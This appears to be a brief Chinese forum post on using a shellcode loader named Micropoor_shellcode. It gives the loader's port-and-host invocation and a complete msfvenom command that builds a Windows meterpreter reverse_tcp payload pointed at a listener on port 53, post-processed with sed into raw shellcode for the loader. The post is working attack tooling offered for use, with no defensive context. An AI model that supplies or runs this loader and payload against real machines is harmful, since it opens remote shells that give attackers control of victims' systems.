|
Micropoor_shellcode:
Usage:
[pre]
Micropoor_shellcode port host
E.g
Micropoor_shellcode.exe 4444 192.168.1.5
[/pre]
Generate payload:
[pre]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 -b '\x00' -f c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
[/pre]
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
×
|